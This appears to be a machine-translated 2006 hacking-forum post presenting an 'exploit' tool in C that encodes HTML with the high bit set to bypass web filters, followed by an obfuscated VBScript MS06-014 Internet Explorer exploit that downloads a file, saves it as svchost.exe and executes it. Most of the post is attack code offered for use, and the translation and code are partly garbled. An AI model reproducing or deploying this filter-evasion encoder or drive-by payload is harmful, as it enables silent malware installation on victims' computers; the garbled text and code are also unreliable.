html net horse generic free kill-vulnerability warning-the black bar safety net

ID MYHACK58:62200612873
Type myhack58
Reporter 佚名
Modified 2006-11-14T00:00:00


Abroad to several websites to see a few cattle for this vulnerability discussion, deep feeling, wrote an Exp, the principle is simple, the master of drifting........ 例子 :ascii.exe hack.txt >hack.htm Vulnerabilities with server-independent, and the client browser is concerned, the current through eating is ASCII of course does not support Chinese characters, remember, Oh */

include <stdio. h>

int main(int argc,char* argv) { FILE fp; char ch; printf("\n-- Bypassing of web filters by using ASCII Exploit By CoolDiyer --\n"); if(argc<2){ printf("\nUsage: \n\t %s srcfile >destfile\n",argv[0]); return -1; } if((fp=fopen(argv[1],"r"))==NULL){ printf("File %s open Error",argv[1]); return -1; }//Specify the encoding as US-ASCII is a must printf("\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=US-ASCII\" />\n<title>Bypassing of web filters by using ASCII Exploit By CoolDiyer</title>\n</head><body>\n"); while((ch=fgetc(fp))!= EOF){ ch|=0x80; //put the 7 bits into 8 bits, this sentence is the core, huh? printf("%c",ch); }; fclose(fp); printf("\n</body></html>\n"); return -1; }

With ms06014 for example, the source code is as follows..............

<html> <title>MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-0 1 4)</title> <script language="VBScript"> on error resume next shell = "<"> Set CAOc = document. createElement("object") CAOc. setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" seturla="down" seturlb="file" seturlc="copy" seturld="exit" seturle="base" CAOi="! []( Microsoft. XMLHTTP" Set CAOd = CAOc. CreateObject(CAOi,"") seturlf="Ado" seturlg="db." seturlh="Str" seturli="eam" CAOf=seturlf&seturlg&seturlh&seturli CAOg=CAOf set CAOa = CAOc. createobject(CAOg,"") CAOa. type = 1 CAOh="GET" CAOd. Open CAOh, shell, False CAOd. Send CAO9="svchost.exe" set CAOb = CAOc. createobject("Scripting. FileSystemObject","") set CAOe = CAOb. GetSpecialFolder(2) CAOa. open CAO8="CAOa. BuildPath(CAOa,CAO8)" CAO7="CAOb. BuildPath(CAOb,CAO7)" CAO6="CAOc. BuildPath(CAOd,CAO6)" CAO5="CAOd. BuildPath(CAOf,CAO5)" CAO4="CAOe. BuildPath(CAOg,CAO4)" CAO3="CAOf. BuildPath(CAOh,CAO4)" CAO2="CAOg. BuildPath(CAOi,CAO3)" CAO1="CAOh. BuildPath(CAOg,CAO1)" CAO0="CAOi. BuildPath(CAOk,CAO0)" CAO9= CAOb. BuildPath(CAOe,CAO9) CAOa. write CAOd. responseBody CAOa. savetofile CAO9,2 CAOa. close set CAOe = CAOc. createobject("Shell. Application","") CAOe. ShellExecute CAO9,BBS,BBS,"open",0 </script> </html>

加密 后 ascii.exe ie.htm >a.htm

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" /> <title>Bypassing of web filters by using ASCII Exploit By CoolDiyer</title> </head><body>